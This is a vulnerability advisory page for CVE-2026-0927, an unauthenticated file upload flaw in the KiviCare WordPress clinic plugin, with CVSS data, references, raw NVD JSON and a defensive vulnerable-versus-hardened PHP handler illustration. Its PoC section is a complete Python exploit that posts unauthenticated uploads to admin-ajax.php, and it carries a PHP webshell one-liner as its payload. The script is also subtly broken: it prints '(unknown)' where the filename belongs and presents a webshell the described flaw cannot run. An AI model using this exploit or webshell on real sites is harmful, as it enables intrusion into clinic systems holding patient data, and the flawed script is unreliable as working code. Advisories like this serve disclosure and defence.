Security Vulnerability Report
CVE-2026-0927 CVSS 5.3 MEDIUM

CVE-2026-0927

Published: 2026-01-23 06:15:50
Last Modified: 2026-04-15 00:35:42

Description

The KiviCare – Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to arbitrary file uploads due to missing authorization checks in the uploadMedicalReport() function in all versions up to, and including, 3.6.15. This makes it possible for unauthenticated attackers to upload text files and PDF documents to the affected site's server which may be leveraged for further attacks such as hosting malicious content or phishing pages via PDF files.
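The weakness the description names is a WordPress AJAX upload handler that never checks who is calling. Below, as an added illustration written for this report and not the plugin's own code, is that vulnerable shape beside a hardened one; the hook names, nonce action, capability and allowed types are assumptions.

```php
<?php
// Added illustration for this report, not KiviCare's code. Hook names, the nonce
// action, the capability and the allowed types are assumptions.

// Vulnerable shape (CWE-862): reachable by logged-out visitors, no caller check at all.
add_action('wp_ajax_nopriv_demo_upload_report', 'demo_upload_report_vulnerable');
function demo_upload_report_vulnerable() {
    $upload = wp_handle_upload($_FILES['file'], ['test_form' => false]);
    wp_send_json($upload);
}

// Hardened shape: authenticated hook only, nonce, explicit capability, server-side type check.
add_action('wp_ajax_demo_upload_report', 'demo_upload_report_hardened');
function demo_upload_report_hardened() {
    // Nonce issued to the caller with wp_create_nonce('demo_upload_report'); rejects CSRF.
    check_ajax_referer('demo_upload_report', 'nonce');

    // Being logged in is not authorization: require a capability that fits the action.
    if (!current_user_can('upload_files')) {
        wp_send_json_error(['message' => 'Not allowed'], 403);
    }

    if (empty($_FILES['file']['tmp_name']) || !is_uploaded_file($_FILES['file']['tmp_name'])) {
        wp_send_json_error(['message' => 'No file received'], 400);
    }

    // Allowlist by extension and sniffed content; the client-supplied Content-Type is ignored.
    $allowed = ['pdf' => 'application/pdf', 'txt' => 'text/plain'];
    $check = wp_check_filetype_and_ext($_FILES['file']['tmp_name'], $_FILES['file']['name'], $allowed);
    if (empty($check['ext']) || empty($check['type'])) {
        wp_send_json_error(['message' => 'Unsupported file type'], 415);
    }

    // Let WordPress move the file and sanitize its name; 'mimes' enforces the allowlist again.
    $upload = wp_handle_upload($_FILES['file'], ['test_form' => false, 'mimes' => $allowed]);
    if (isset($upload['error'])) {
        wp_send_json_error(['message' => $upload['error']], 400);
    }
    wp_send_json_success(['url' => $upload['url']]);
}
```

The hardened handler is registered only on the wp_ajax_ hook, so unauthenticated requests never reach it, and it still checks a capability because a session alone does not establish authorization.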

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

KiviCare – Clinic & Patient Management System (EHR) <= 3.6.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2026-0927 PoC - KiviCare Arbitrary File Upload
# Target: WordPress site with KiviCare plugin <= 3.6.15


def exploit_file_upload(target_url, file_content, filename):
    """
    Exploit arbitrary file upload vulnerability in KiviCare plugin
    uploadMedicalReport() function lacks authorization check
    """
    # Endpoint for medical report upload
    upload_endpoint = f"{target_url}/wp-admin/admin-ajax.php"

    # Prepare the malicious file
    files = {
        'file': (filename, file_content, 'application/pdf')
    }

    # Data payload - action triggers uploadMedicalReport()
    data = {
        'action': 'kivicare_medical_report_upload',
        'file_name': filename
    }

    print(f"[*] Target: {target_url}")
    print(f"[*] Uploading malicious file: (unknown)")

    try:
        # Send upload request without authentication
        response = requests.post(
            upload_endpoint,
            files=files,
            data=data,
            timeout=30
        )

        if response.status_code == 200:
            print(f"[+] File upload request sent successfully")
            print(f"[+] Response: {response.text[:200]}")
            # Check if file is accessible
            uploaded_path = f"{target_url}/wp-content/uploads/kivicare/(unknown)"
            print(f"[*] Check uploaded file at: {uploaded_path}")
        else:
            print(f"[-] Upload failed with status: {response.status_code}")

    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve_2026_0927_poc.py <target_url>")
        print("Example: python cve_2026_0927_poc.py http://vulnerable-site.com")
        sys.exit(1)

    target = sys.argv[1].rstrip('/')
    # Example malicious content - could be webshell or phishing page
    malicious_content = "<?php system($_GET['cmd']); ?>"
    filename = "malicious.php.txt"
    exploit_file_upload(target, malicious_content, filename)
```

References

https://plugins.trac.wordpress.org/browser/kivicare-clinic-management-system/tags/3.6.15/app/controllers/KCAppointmentController.php#L1328
https://plugins.trac.wordpress.org/browser/kivicare-clinic-management-system/trunk/app/controllers/KCAppointmentController.php#L1328
https://plugins.trac.wordpress.org/changeset/3443088/kivicare-clinic-management-system/trunk/app/controllers/KCAppointmentController.php
https://www.wordfence.com/threat-intel/vulnerabilities/id/489931ef-bac3-4de8-84ec-6f226d96f778?source=cve

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-0927", "sourceIdentifier": "[email protected]", "published": "2026-01-23T06:15:50.480", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The KiviCare – Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to arbitrary file uploads due to missing authorization checks in the uploadMedicalReport() function in all versions up to, and including, 3.6.15. This makes it possible for unauthenticated attackers to upload text files and PDF documents to the affected site's server which may be leveraged for further attacks such as hosting malicious content or phishing pages via PDF files."}, {"lang": "es", "value": "El plugin KiviCare – Sistema de Gestión de Clínicas y Pacientes (EHR) para WordPress es vulnerable a subidas arbitrarias de archivos debido a la falta de comprobaciones de autorización en la función uploadMedicalReport() en todas las versiones hasta la 3.6.15, inclusive. Esto hace posible que atacantes no autenticados suban archivos de texto y documentos PDF al servidor del sitio afectado, lo que puede ser aprovechado para ataques adicionales como alojar contenido malicioso o páginas de phishing a través de archivos PDF."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/kivicare-clinic-management-system/tags/3.6.15/app/controllers/KCAppointmentController.php#L1328", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/kivicare-clinic-management-system/trunk/app/controllers/KCAppointmentController.php#L1328", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3443088/kivicare-clinic-management-system/trunk/app/controllers/KCAppointmentController.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/489931ef-bac3-4de8-84ec-6f226d96f778?source=cve", "source": "[email protected]"}]}}
```